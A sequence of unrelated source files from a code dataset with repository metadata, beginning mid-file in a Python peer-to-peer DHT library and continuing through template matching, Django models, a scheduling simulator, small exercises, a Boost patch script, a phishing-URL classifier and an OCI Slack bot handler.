DHTRequestHandler\nfrom .const import Message, Config, Storage\nfrom . import upnp\nfrom . import excepions\nfrom . import threads\nfrom .log import log_to_stderr, l\n\n\n# TODO: idea storage limit per peer\n# TODO: local peer id to storage (sqlite)\n# TODO: no republish (write docu why)\n# TODO: multi-value (per client GC)\n# TODO: get with value-limit\n# TODO: tcp (lazymq)\n# TODO: storage limit\n# TODO: check if we have a RPC state leak\n# TODO: keep the same id (if port/IPs are the same??)\n# TODO: data to disk (optional)\n# TODO: async interface (futures)\n# TODO: more/better unittest + 100% coverage\n# TODO: what about IP changes?\n# 1. Is there a binding problem?\n# 2. Refactor address discover and make maint-thread\n# TODO: Consider sending multiple answers (split!) if EMSGSIZE occurs\n# TODO: pep8\n# TODO: lint\n# TODO: documentaion\n# TODO: review\n# TODO: think a bit more about security\n\n__all__ = ['DHT']\n\n\nclass DHT(object):\n\n _log_enabled = False\n MaxSizeException = excepions.MaxSizeException\n NetworkError = excepions.NetworkError\n\n def __init__(\n self,\n port = Config.PORT,\n hostv4 = None,\n hostv6 = None,\n id_ = None,\n boot_host = None,\n boot_port = None,\n listen_hostv4 = \"\",\n listen_hostv6 = \"\",\n zero_config = False,\n default_encoding = None,\n port_map = True,\n network_id = Config.NETWORK_ID,\n storage = Storage.MEMORY,\n log = True,\n debug = True,\n ):\n if log:\n log_to_stderr(debug)\n if not id_:\n id_ = random_id()\n if port < 1024:\n raise DHT.NetworkError(\"Ports below 1024 are not allowed\")\n if boot_host or zero_config:\n self.firewalled = True\n else:\n self.firewalled = False\n self.stop = threading.Event()\n self.encoding = default_encoding\n self.peer = Peer(port, id_, hostv4, hostv6)\n if storage == Storage.NONE:\n self.data = None\n else:\n self.data = LockedDict()\n self.buckets = BucketSet(Config.K, Config.ID_BITS, self.peer.id)\n self.rpc_states = LockedDict()\n self.server4 = None\n self.server6 = None\n self.boot_peer = None\n self.network_id = network_id\n if not hostv4:\n if zero_config:\n hostv4 = \"\"\n self.hostv4 = hostv4\n else:\n self.hostv4 = ipaddress.ip_address(hostv4)\n if not hostv6:\n if zero_config:\n hostv6 = \"\"\n self.hostv6 = hostv6\n else:\n self.hostv6 = ipaddress.ip_address(hostv6)\n # Detecting dual_stack sockets seems not to work on some OSs\n # so we always use two sockets\n if hostv6 is not None:\n self.server6 = DHTServer(\n (listen_hostv6, port),\n DHTRequestHandler,\n is_v6=True\n )\n self.server6.dht = self\n self.server6_thread = threading.Thread(\n target=self.server6.serve_forever\n )\n self.server6_thread.daemon = True\n self.server6_thread.start()\n self.fw_sock6 = socket.socket(\n socket.AF_INET6,\n socket.SOCK_DGRAM\n )\n self.fw_sock6.setsockopt(\n socket.IPPROTO_IPV6,\n socket.IPV6_V6ONLY,\n True,\n )\n self.fw_sock6.bind((listen_hostv6, port + 1))\n if hostv4 is not None:\n self.server4 = DHTServer(\n (listen_hostv4, port),\n DHTRequestHandler,\n is_v6=False\n )\n self.server4.dht = self\n self.server4_thread = threading.Thread(\n target=self.server4.serve_forever\n )\n self.server4_thread.daemon = True\n self.server4_thread.start()\n self.fw_sock4 = socket.socket(\n socket.AF_INET,\n socket.SOCK_DGRAM\n )\n self.fw_sock4.bind((listen_hostv4, port + 1))\n if port_map:\n if not upnp.try_map_port(port):\n l.warning(\"UPnP could not map port\")\n if zero_config:\n try:\n self._bootstrap(\"31.171.244.153\", Config.PORT)\n except DHT.NetworkError:\n self._bootstrap(\"2001:470:7:ab::2\", Config.PORT)\n else:\n if boot_host:\n self._bootstrap(boot_host, boot_port)\n self.bucket_refrsh = threads.run_bucket_refresh(self)\n self.check_firewall = threads.run_check_firewalled(self)\n self.rpc_cleanup = threads.run_rpc_cleanup(self)\n\n def close(self):\n self.stop.set()\n self.bucket_refrsh.join()\n self.check_firewall.join()\n self.rpc_cleanup.join()\n if self.server4:\n self.server4.shutdown()\n self.server4.server_close()\n if self.server6:\n self.server6.shutdown()\n self.server6.server_close()\n self.server4.idle.wait()\n self.server6.idle.wait()\n if self.server4:\n self.fw_sock4.close()\n if self.server6:\n self.fw_sock6.close()\n\n def iterative_find_nodes(self, key, boot_peer=None):\n shortlist = Shortlist(Config.K, key, self.peer.id)\n shortlist.update(self.buckets.nearest_nodes(key))\n if boot_peer:\n rpc_id, hash_id = rpc_id_pair()\n with self.rpc_states as states:\n states[hash_id] = [time.time(), shortlist]\n shortlist.updated.clear()\n boot_peer.find_node(key, rpc_id, dht=self, peer_id=self.peer.id)\n shortlist.updated.wait(Config.SLEEP_WAIT)\n start = time.time()\n try:\n while (not shortlist.complete()):\n nearest_nodes = shortlist.get_next_iteration(Config.ALPHA)\n for peer in nearest_nodes:\n shortlist.mark(peer)\n rpc_id, hash_id = rpc_id_pair()\n with self.rpc_states as states:\n states[hash_id] = [time.time(), shortlist]\n shortlist.updated.clear()\n peer.find_node(key, rpc_id, dht=self, peer_id=self.peer.id)\n shortlist.updated.wait(Config.SLEEP_WAIT)\n return shortlist.results()\n finally:\n end = time.time()\n # Convert to logging\n l.info(\n \"find_nodes: %.5fs (%d, %d, %d)\",\n (end - start),\n len(shortlist.list),\n len([it for it in shortlist.list if it[1]]),\n len(self.buckets.peerslist()),\n )\n\n def iterative_find_value(self, key):\n shortlist = Shortlist(Config.K, key, self.peer.id)\n shortlist.update(self.buckets.nearest_nodes(key))\n start = time.time()\n try:\n while (not shortlist.complete()):\n nearest_nodes = shortlist.get_next_iteration(Config.ALPHA)\n for peer in nearest_nodes:\n shortlist.mark(peer)\n rpc_id, hash_id = rpc_id_pair()\n with self.rpc_states as states:\n states[hash_id] = [time.time(), shortlist]\n shortlist.updated.clear()\n peer.find_value(\n key,\n rpc_id,\n dht=self,\n peer_id=self.peer.id\n )\n shortlist.updated.wait(Config.SLEEP_WAIT)\n if shortlist.completion_value.done():\n return shortlist.completion_result()\n return shortlist.completion_result()\n finally:\n end = time.time()\n # Convert to logging\n l.info(\n \"find_value: %.5fs (%d, %d, %d)\",\n (end - start),\n len(shortlist.list),\n len([it for it in shortlist.list if it[1]]),\n len(self.buckets.peerslist()),\n )\n\n def _discov_warning(self, found, defined):\n \"\"\" Log a warning about wrong public address \"\"\"\n # TODO: To logging\n l.warn( # noqa\n\"Warning: defined public address (%s) does not match the\\n\" # noqa\n\"address found by the bootstap peer (%s). We will use the\\n\" # noqa\n\"defined address. IPv4/6 convergence will not be optimal!\", # noqa\ndefined, # noqa\nfound # noqa\n )\n\n def _discov_result(self, res):\n \"\"\" Set the discover result in the client \"\"\"\n for me_msg in res[1:]:\n try:\n me_tuple = me_msg[Message.CLI_ADDR]\n me_peer = Peer(*me_tuple, is_bytes=True)\n if me_peer.hostv4:\n if not self.hostv4:\n self.peer.hostv4 = me_peer.hostv4\n elif me_peer.hostv4 != self.hostv4:\n self._discov_warning(me_peer.hostv4, self.hostv4)\n if me_peer.hostv6:\n if not self.hostv6:\n self.peer.hostv6 = me_peer.hostv6\n elif me_peer.hostv6 != self.hostv6:\n self._discov_warning(me_peer.hostv6, self.hostv6)\n except TypeError:\n pass\n\n def _len_states(self, hash_id):\n \"\"\" Return length of rpc states \"\"\"\n with self.rpc_states as states:\n return len(states[hash_id])\n\n def _bootstrap(self, boot_host, boot_port):\n addr = socket.getaddrinfo(boot_host, boot_port)[0][4][0]\n ipaddr = ipaddress.ip_address(sixunicode(addr))\n if isinstance(ipaddr, ipaddress.IPv6Address):\n boot_peer = Peer(boot_port, 0, hostv6=str(ipaddr))\n else:\n boot_peer = Peer(boot_port, 0, hostv4=str(ipaddr))\n\n rpc_id, hash_id = rpc_id_pair()\n with self.rpc_states as states:\n states[hash_id] = [time.time()]\n boot_peer.ping(self, self.peer.id, rpc_id = rpc_id)\n time.sleep(Config.SLEEP_WAIT)\n\n peer_found = False\n\n if self._len_states(hash_id) > 1:\n try:\n with self.rpc_states as states:\n message = states[hash_id][1]\n boot_peer = Peer(*message[Message.ALL_ADDR], is_bytes=True)\n peer_found = True\n except KeyError:\n with self.rpc_states as states:\n states[hash_id].pop(1)\n if not peer_found:\n time.sleep(Config.SLEEP_WAIT * 3)\n boot_peer.ping(self, self.peer.id, rpc_id = rpc_id)\n time.sleep(Config.SLEEP_WAIT)\n if self._len_states(hash_id) > 1:\n with self.rpc_states as states:\n self._discov_result(states[hash_id])\n else:\n raise DHT.NetworkError(\"Cannot boot DHT\")\n with self.rpc_states as states:\n del states[hash_id]\n\n rpc_id, hash_id = rpc_id_pair()\n\n with self.rpc_states as states:\n states[hash_id] = [time.time()]\n boot_peer.ping(self, self.peer.id, rpc_id = rpc_id)\n time.sleep(Config.SLEEP_WAIT)\n\n if self._len_states(hash_id) > 2:\n with self.rpc_states as states:\n self._discov_result(states[hash_id])\n else:\n time.sleep(Config.SLEEP_WAIT * 3)\n boot_peer.ping(self, self.peer.id, rpc_id = rpc_id)\n time.sleep(Config.SLEEP_WAIT)\n if self._len_states(hash_id) > 1:\n with self.rpc_states as states:\n self._discov_result(states[hash_id])\n else:\n raise DHT.NetworkError(\"Cannot boot DHT\")\n with self.rpc_states as states:\n del states[hash_id]\n\n self.iterative_find_nodes(random_id(), boot_peer=boot_peer)\n if len(self.buckets.nearest_nodes(self.peer.id)) < 1:\n time.sleep(Config.SLEEP_WAIT * 3)\n self.iterative_find_nodes(random_id(), boot_peer=boot_peer)\n time.sleep(Config.SLEEP_WAIT)\n if len(self.buckets.nearest_nodes(self.peer.id)) < 1:\n raise DHT.NetworkError(\"Cannot boot DHT\")\n self.boot_peer = boot_peer\n l.info(\"DHT is bootstrapped\")\n\n def get(self, key, encoding=None):\n if not encoding:\n encoding = self.encoding\n hashed_key = hash_function(msgpack.dumps(key))\n res = None\n if self.data:\n with self.data as data:\n if hashed_key in data:\n res = data[hashed_key]\n if res is None:\n res = self.iterative_find_value(hashed_key)\n if encoding:\n res = msgpack.loads(res, encoding=encoding)\n return res\n\n def __getitem__(self, key):\n return self.get(key)\n\n def set(self, key, value, encoding=None):\n if not encoding:\n encoding = self.encoding\n if encoding:\n value = msgpack.dumps(value, encoding=encoding)\n hashed_key = hash_function(msgpack.dumps(key))\n nearest_nodes = self.iterative_find_nodes(hashed_key)\n if self.data:\n with self.data as data:\n data[hashed_key] = value\n for node in nearest_nodes:\n node.store(hashed_key, value, dht=self, peer_id=self.peer.id)\n\n def __setitem__(self, key, value):\n self.set(key, value)\n","repo_name":"pombreda/dht3k","sub_path":"dht3k/pydht.py","file_name":"pydht.py","file_ext":"py","file_size_in_byte":14020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9434843200","text":"import cv2\nimport numpy as np\nimport os\n\n\n#Due to my limited dataset and poor effects for weights trained on public datasets,\n# I added template matching and cut objects from my own dataset as templates to classify changed targets.\n\ndef match_template(img, temp_path_1, temp_path_2, threshold1,threshold2):\n list1 = []\n list2 = []\n if len(img.shape) == 3:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n file_list = os.listdir(temp_path_1)\n for file in file_list:\n #print(file)\n template = cv2.imread(os.path.join(temp_path_1,file),0) #read templates(gray image)\n w, h = template.shape[::-1]\n #print(w,h)\n img_n = cv2.resize(img,(w,h))\n res = cv2.matchTemplate(img_n, template, cv2.TM_CCOEFF_NORMED) #template matching\n list1.append(res)\n maxVal1 = max(list1)\n print(maxVal1)\n print('now to another class')\n #detect another class\n file_list = os.listdir(temp_path_2)\n for file in file_list:\n # print(file)\n template = cv2.imread(os.path.join(temp_path_2, file), 0)\n w, h = template.shape[::-1]\n img_n = cv2.resize(img, (w, h))\n res = cv2.matchTemplate(img_n, template, cv2.TM_CCOEFF_NORMED)\n list2.append(res)\n # print(res)\n maxVal2 = max(list2)\n print(maxVal2)\n if maxVal1 > threshold1:\n text = 'person'\n elif maxVal2 > threshold2:\n text = 'car'\n else:\n text = None\n print(text)\n\n return text\n\n\nif __name__ == '__main__':\n img = cv2.imread('bbox/1.jpg')#changed areas, may include object I need\n temp_path_1 = 'temp/template_img/car/' #path to templates\n temp_path_2 = 'temp/template_img/infred_person/'\n text = match_template(img,temp_path_1,temp_path_2,0.5,0.5)#threshold value can be adjusted\n","repo_name":"yusz07/Find-Changes-between-Two-Images","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"13036067109","text":"from django.db import models\nfrom core.models import mixins as core_mixins\nfrom .markdown_scenario import MarkdownScenarioStatus\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.utils import timezone\n\nfrom core.utils.ordered_enum import OrderedEnum\n\n\nclass MarkdownEventScopeFileInsertType(models.TextChoices):\n ADD = \"ADD\"\n REPLACE = \"REPLACE\"\n\n\nclass MarkdownEventType(models.TextChoices):\n RESET = \"RESET\"\n SEASONAL = \"SEASONAL\"\n\n\nclass MarkdownEventStatus(OrderedEnum):\n ARCHIVED = \"ARCHIVED\"\n SETUP = \"SETUP\"\n PENDING = \"PENDING\"\n DONE = \"DONE\"\n\n\nclass MarkdownArticleGroupType(models.TextChoices):\n NORMAL = \"NORMAL\"\n\n\nclass MarkdownEvent(core_mixins.TimeStampMixin, models.Model):\n\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=50)\n slug = models.SlugField(null=True, blank=True)\n after_season_start_date = models.DateField(blank=True, null=True)\n season_start_date = models.DateField(blank=True, null=True)\n end_date = models.DateField(blank=True, null=True)\n type = models.CharField(\n max_length=50,\n choices=MarkdownEventType.choices,\n default=MarkdownEventType.RESET,\n )\n status = models.CharField(\n max_length=50,\n choices=MarkdownEventStatus.choices,\n default=MarkdownEventStatus.SETUP,\n )\n\n last_modified = models.DateTimeField(default=timezone.now)\n\n @property\n def articles(self):\n return [scope.article_id for scope in self.scope.all()]\n\n @property\n def last_activity_time(self):\n last_activity_dates = [scenario.updated_at for scenario in self.scenarios.all()]\n last_activity_dates = sorted(\n last_activity_dates,\n reverse=True,\n )\n\n return last_activity_dates[0] if last_activity_dates else self.updated_at\n\n def __str__(self):\n return str(self.name)\n\n class Meta:\n ordering = [\"id\"]\n\n\nclass MarkdownEventScope(models.Model):\n event = models.ForeignKey(\n \"core.MarkdownEvent\",\n on_delete=models.CASCADE,\n related_name=\"scope\",\n )\n article = models.ForeignKey(\n \"core.Article\",\n on_delete=models.CASCADE,\n related_name=\"scope\",\n )\n article_group = models.ForeignKey(\n \"core.MarkdownArticleGroup\",\n on_delete=models.SET_NULL,\n default=None,\n null=True,\n blank=True,\n related_name=\"scope\",\n )\n stores = models.JSONField(default=list, null=True, blank=True)\n call_in = models.BooleanField(\n default=False,\n )\n item_md_end_date = models.DateField(null=True, blank=True)\n clone_article = models.ForeignKey(\n \"core.Article\",\n on_delete=models.CASCADE,\n related_name=\"scope_clone_article\",\n null=True,\n blank=True,\n )\n cost_overwrite = models.DecimalField(\n decimal_places=2, max_digits=10, null=True, blank=True\n )\n vendor_funding = models.DecimalField(\n decimal_places=2, max_digits=10, null=True, blank=True\n )\n discount_covered = models.FloatField(\n validators=[MinValueValidator(0), MaxValueValidator(1)],\n null=True,\n blank=True,\n )\n online_market = models.BooleanField(\n default=True,\n )\n discount_group = models.IntegerField(null=True, blank=True)\n\n @property\n def store_count(self):\n return len(list(self.stores))\n\n class Meta:\n unique_together = (\"event\", \"article\", \"article_group\")\n\n\nclass MarkdownArticleGroup(models.Model):\n class MarkdownArticleGroupStatus(OrderedEnum):\n ARCHIVED = \"ARCHIVED\"\n ACTIVE = \"ACTIVE\"\n PAUSED = \"PAUSED\"\n\n class MarkdownArticleGroupApprovalStatus(OrderedEnum):\n DRAFT = \"DRAFT\"\n SUBMITTED = \"SUBMITTED\"\n APPROVED = \"APPROVED\"\n\n name = models.CharField(max_length=50)\n slug = models.SlugField(null=True, blank=True)\n start_date = models.DateField(blank=True, null=True)\n type = models.CharField(\n max_length=50,\n choices=MarkdownArticleGroupType.choices,\n default=MarkdownArticleGroupType.NORMAL,\n )\n event = models.ForeignKey(\n \"core.MarkdownEvent\",\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n related_name=\"article_groups\",\n )\n status = models.CharField(\n max_length=50,\n choices=MarkdownArticleGroupStatus.choices,\n default=MarkdownArticleGroupStatus.ACTIVE,\n )\n approval_status = models.CharField(\n max_length=50,\n choices=MarkdownArticleGroupApprovalStatus.choices,\n default=MarkdownArticleGroupApprovalStatus.DRAFT,\n )\n\n @property\n def articles(self):\n return self.scope.all().values_list(\"article\", flat=True)\n\n @property\n def markdown_event_end_date(self):\n return self.event.end_date\n\n @property\n def scenario_max_status(self):\n scenarios = self.scenarios.all()\n statuses = [MarkdownScenarioStatus(scenario.status) for scenario in scenarios]\n\n return max(statuses) if len(statuses) > 0 else None\n\n def __str__(self):\n return str(self.name)\n\n class Meta:\n ordering = [\"id\"]\n","repo_name":"kennedydaniel/markdowns-models","sub_path":"models/markdown_event.py","file_name":"markdown_event.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36351889732","text":"\"\"\"Module containing the scheduling simulator (engine).\n\nThe simulator takes a DAG of tasks and a number of resources, and\ncomputes how the tasks would execute following their priorities.\n\"\"\"\n\nimport heapq # for heaps (it implements only min-heaps)\n\n\ndef simulate(graph, num_resources, debug=False):\n \"\"\"Simulation engine.\n\n Parameters\n ----------\n graph : Graph object\n DAG of tasks to run\n num_resources : int\n Number of identical resources to simulate\n debug : bool [default = False]\n True if debug messages should be printed\n\n Returns\n -------\n int\n Makespan\n \"\"\"\n print('* Starting the simulation *')\n if debug:\n print(f'- Graph of {len(graph.vertices)} tasks running on' +\n f' {num_resources} resources')\n\n # Setup:\n # - Creates a list of free resources\n free_resources = [i for i in range(num_resources)]\n # - Puts all available tasks (top tasks) in the priority queue\n priority_queue = list()\n for task in graph.vertices.values():\n if not task.predecessors:\n priority_queue.append(task)\n if debug:\n print(f'- {task} is ready to run')\n heapq.heapify(priority_queue)\n # - Sets the start time as zero\n time = 0\n # - Creates the bootstrapping event in the event queue of the simulator\n # format of an event: (time, task id, resource id)\n events = [(time, None, None)]\n\n # Simulation runs while there are events to handle\n # Steps:\n # 1. remove the first event, see if there are any new free tasks\n # 2. schedule available tasks while there are available resources\n while events:\n # Step 1\n time, task_id, res_id = heapq.heappop(events)\n if task_id != None:\n # event: task finished running\n task = graph.vertices[task_id]\n if debug:\n print(f'[t={time}]: END {task}, resource {res_id}')\n\n # removes the task from the predecessors of its successors\n for succ_id in task.successors:\n successor = graph.vertices[succ_id]\n successor.predecessors.remove(task_id)\n # if it has no predecessors, it is free to run\n if not successor.predecessors:\n heapq.heappush(priority_queue, successor)\n if debug:\n print(f'- {successor} is now ready to run')\n\n # adds the resource to the list of available resources\n free_resources.append(res_id)\n\n # Step 2\n while free_resources and priority_queue:\n # pops the first free resource and free task\n res_id = free_resources.pop(0)\n task = heapq.heappop(priority_queue)\n end_time = time + task.load\n # creates the event for the task's execution\n heapq.heappush(events, (end_time, task.id, res_id))\n if debug:\n print(f'[t={time}]: START {task}, resource {res_id}')\n\n # No more events\n print(f'* Total execution time (makespan) = {time}\\n')\n return time\n","repo_name":"llpilla/study-task-scheduling","sub_path":"simulator/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9792110098","text":"from account import Account\nfrom bank import Bank\n\ndef main():\n a1 = Account()\n a2 = Account()\n a3 = Account()\n a1.init(1, 1000, \"alex\")\n a2.init(2, 2500, \"kate\")\n a3.init(3, 500, \"vova\")\n\n tpl = (a1, a2, a3)\n\n print(Bank.show_all_account(tpl))\n print(f\"Total balance is {Bank.sum_all_balance(tpl)}\")\n print(f\"After month:{Bank.calc_sum_after_month(tpl)}\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Sibirava/Lesson17","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9345179976","text":"import math\n\nm = int(input())\nn = int(input())\ngraph = []\nfound = False\n\nfor i in range(m):\n graph.append([int(x) for x in input().split()])\n\ndef findNodes(num):\n pairs = []\n for i in range(1, math.ceil(math.sqrt(num) + 1)):\n if num % i == 0:\n p = num // i\n if (i == m and p == n or i == n and p == m):\n global found\n found = True\n\n if (i <= m and p <= n):\n pairs.append((i, p))\n if (i <= n and p <= m):\n pairs.append((p, i))\n return pairs\n\ndef BFS():\n visited = dict()\n queue = []\n\n queue.append((1, 1))\n visited[(1, 1)] = True\n while queue:\n global found\n if found:\n return \"yes\"\n\n front = queue.pop(0)\n\n if front == (m, n):\n return \"yes\"\n\n for f in findNodes(graph[front[0] - 1][front[1] - 1]):\n if not f in visited:\n queue.append(f)\n visited[f] = True\n return \"no\"\n\nprint(BFS())","repo_name":"aqts-aqts/ccc-solutions","sub_path":"2020/S2.py","file_name":"S2.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"30152300466","text":"import os\r\nimport vcmiutil\r\nimport vcmiconf\r\n\r\ndef fixReaddirRUsage():\r\n\treplacements = [ vcmiutil.ReplacementEntry(\"# if !defined(__CYGWIN__)\\\\\", \"#if 0\\\\\") ]\r\n\t\r\n\tvcmiutil.fixFile(\"./ext/boost/\" + vcmiconf.config[\"boostFolderName\"] + \"/libs/filesystem/src/operations.cpp\", replacements)\r\n\r\ndef fixBrokenFeatureDetectionInPthreadMutex():\r\n\treplacements = [ vcmiutil.ReplacementEntry(\"#if (defined(_POSIX_TIMEOUTS) && (_POSIX_TIMEOUTS-0)>=200112L) \\\\\", \"#if 0 \\\\\") ]\r\n\treplacements2 = [ vcmiutil.ReplacementEntry(\"#if (defined _POSIX_TIMEOUTS && (_POSIX_TIMEOUTS-0)>=200112L) \\\\\", \"#if 0 \\\\\") ]\r\n\t\r\n\tvcmiutil.fixFile(\"./ext/boost/\" + vcmiconf.config[\"boostFolderName\"] + \"/boost/thread/pthread/mutex.hpp\", replacements)\r\n\tvcmiutil.fixFile(\"./ext/boost/\" + vcmiconf.config[\"boostFolderName\"] + \"/boost/thread/pthread/recursive_mutex.hpp\", replacements2)\r\n\t\r\ndef fixBrokenEpollDetectionOnOldApi():\r\n\treplacements = [ vcmiutil.ReplacementEntry(\"#if defined(EPOLL_CLOEXEC)\", \"#if defined(EPOLL_CLOEXEC) && __ANDROID_API__ >= 21\") ]\r\n\t\r\n\tvcmiutil.fixFile(\"./ext/boost/\" + vcmiconf.config[\"boostFolderName\"] + \"/boost/asio/detail/impl/epoll_reactor.ipp\", replacements)\r\n\r\nfixBrokenFeatureDetectionInPthreadMutex()\r\nfixReaddirRUsage()\r\nfixBrokenEpollDetectionOnOldApi()","repo_name":"vcmi/vcmi-android","sub_path":"fix_boost_files.py","file_name":"fix_boost_files.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"67"} +{"seq_id":"17827788317","text":"import pandas as pd\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers.embeddings import Embedding\nfrom keras_preprocessing.text import one_hot\nfrom keras.preprocessing.sequence import pad_sequences\nfrom sklearn.model_selection import train_test_split\nfrom keras.utils import np_utils\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv('../data/urldata.csv')\nurl = np.array(df['url'])\nlabel1 = np.array(df['label'])\nsiz = int(0.1 * len(label1))\nurl = url[0:siz]\n\n\n# no of dots in url\ndef label_encode(label):\n enclabel = []\n for i in label:\n if i == \"bad\":\n enclabel.append(0)\n else:\n enclabel.append(1)\n return enclabel\n\n\n# one hot encode\nencoded_docs = [one_hot(d, 20 * len(url)) for d in url]\nleng = []\nfor i in encoded_docs:\n leng.append(len(i))\nprint(max(leng))\npadded_docs = pad_sequences(encoded_docs, maxlen=max(leng), padding='post')\n\nlabel = label_encode(label1)\nlabel = label[0:siz]\nla = label\nlabel = np_utils.to_categorical(label, 2)\n\nmodel = Sequential()\nmodel.add(Embedding(siz, 32, input_length=max(leng)))\ninput_array = padded_docs\nmodel.compile('rmsprop', 'mse')\noutput_array = model.predict(input_array)\nx, y = [], []\nfor i in output_array:\n pca = PCA(n_components=2)\n a = pca.fit(i)\n a, b = pca.singular_values_\n x.append(a)\n y.append(b)\n\nfig = plt.figure()\nax = Axes3D(fig)\nprint(label.shape)\nax.scatter(x, y, la)\nplt.xlabel('xcomponet')\nplt.ylabel('ycomponet')\n# plt.zlabel('label')\n\n\nplt.show()\n\nout_train, out_test, label_train, label_test = train_test_split(output_array, label, test_size=0.05, random_state=42)\nnp.save(\"../matpre/embtrain.npy\", out_train)\nnp.save(\"../matpre/embtest.npy\", out_test)\nnp.save(\"../matpre/latrain.npy\", label_train)\nnp.save(\"../matpre/latest.npy\", label_test)\n","repo_name":"shan1322/phishing-classifier","sub_path":"code/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"31472619710","text":"# -*- coding: utf-8 -*-\n\nfrom message import IntegrationEvent\n\n\nclass CMCACLPermissionUpdate(IntegrationEvent):\n def __init__(self, deploy, tag=''):\n super(CMCACLPermissionUpdate, self).__init__()\n self._deploy = deploy\n self._tag = tag\n self._event_name = 'CMCACLPermissionnUpdateIntegrationEvent'\n\n @property\n def body(self):\n content = super(CMCACLPermissionUpdate, self).body\n content['deploy'] = self._deploy\n content['tag'] = self._tag\n return content\n\n\nclass CMCACLRoleUpdate(IntegrationEvent):\n def __init__(self, deploy, tag=''):\n super(CMCACLRoleUpdate, self).__init__()\n self._deploy = deploy\n self._tag = tag\n self._event_name = 'CMCACLRoleUpdateIntegrationEvent'\n\n @property\n def body(self):\n content = super(CMCACLRoleUpdate, self).body\n content['deploy'] = self._deploy\n content['tag'] = self._tag\n return content\n\n\n","repo_name":"futsystems/cmc.website","sub_path":"eventbus/acl_config_update.py","file_name":"acl_config_update.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8123516552","text":"import base64\nimport io\nfrom fdk import response\nimport json\nimport logging\nimport oci\n\nfrom .base import BaseDispatch\nfrom .dispatch import Dispatcher\nfrom .service import SlackService, Agent, Channel\nfrom .text import Text\n\n\nLOG = logging.getLogger(__name__)\n\nSERVICE = None\nTOKEN = None\nTEAM = None\nNAMESPACE, BUCKET = None, None\n\n\ndef init(cfg):\n global SERVICE, TOKEN, TEAM, NAMESPACE, BUCKET\n if TEAM is None:\n TEAM = load_secret(cfg, 'TEAM')\n if SERVICE is None:\n SERVICE = SlackService(team=TEAM,\n bot_oauth=load_secret(cfg, 'BOT_OAUTH'),\n user_oauth=load_secret(cfg, 'USER_OAUTH'))\n if TOKEN is None:\n TOKEN = load_secret(cfg, 'TOKEN')\n if NAMESPACE is None:\n NAMESPACE = cfg['NAMESPACE']\n if BUCKET is None:\n BUCKET = cfg['BUCKET']\n\n\ndef load_secret(cfg, setting):\n \"\"\"If we have KMS_KEY and KMS_EP defined, use those to decrypt the given secret\n\n Otherwise, pull the value out as plaintext.\"\"\"\n value = cfg.get(setting)\n if value is None:\n return value\n\n # Retrieve key OCID and endpoint\n key = cfg.get(\"KMS_KEY\")\n endpoint = cfg.get(\"KMS_EP\")\n\n if key is None and endpoint is None:\n return value\n\n # Create decryption client\n signer = oci.auth.signers.get_resource_principals_signer()\n client = oci.key_management.KmsCryptoClient({}, endpoint, signer=signer)\n\n # The plaintext is returned as base64-encoded data. Decrypt it (providing a byte sequence)\n # and then produce a UTF-8 string from the result.\n return base64.b64decode(client.decrypt(oci.key_management.models.DecryptDataDetails(\n key_id=key, ciphertext=value)).data.plaintext).decode(\"utf-8\")\n\n\nclass Bot(BaseDispatch):\n pass\n\n\ndef handle(ctx, data: io.BytesIO, bot_class=Bot):\n init(ctx.Config())\n try:\n args = json.loads(data.getvalue())\n LOG.debug('args are %s', {k: args[k] for k in args if k != 'token'})\n\n token = args.get('token')\n if token != TOKEN:\n return response.Response(ctx, status_code=401)\n\n if args.get('challenge') is not None:\n return response.Response(ctx, status_code=200, response_data=args['challenge'])\n\n team = args.get('team_id')\n if team != TEAM:\n return response.Response(ctx, status_code=404)\n\n if SERVICE is None:\n return response.Response(ctx, status_code=404)\n\n if args.get('type') == 'event_callback':\n event = args.get('event', {})\n\n if event.get('type') == 'app_mention':\n pass\n elif event.get('type') == 'message' and event.get('subtype') is None:\n\n text = Text.parse(event.get('text', ''), srv=SERVICE)\n text.ts = event.get('ts')\n sender = Agent(id=event.get('user'))\n channel = Channel(id=event.get('channel'))\n if event.get('channel_type') == 'group':\n channel = channel.replace(is_private=True)\n elif event.get('channel_type') == 'im':\n channel = channel.replace(is_im=True)\n receivers = [Agent(id=rcv, is_bot=True) for rcv in args.get('authed_users', [])]\n\n rp = oci.auth.signers.get_resource_principals_signer()\n dispatcher = Dispatcher(srv=SERVICE,\n default=bot_class, factory=bot_class.load,\n signer=rp, namespace=NAMESPACE, bucket=BUCKET)\n dispatcher.dispatch(sender=sender, channel=channel, receivers=receivers, text=text)\n\n except Exception as e:\n LOG.exception(\"Problem during dispatch: %r\", e)\n return response.Response(ctx, status_code=500)\n\n return response.Response(ctx, 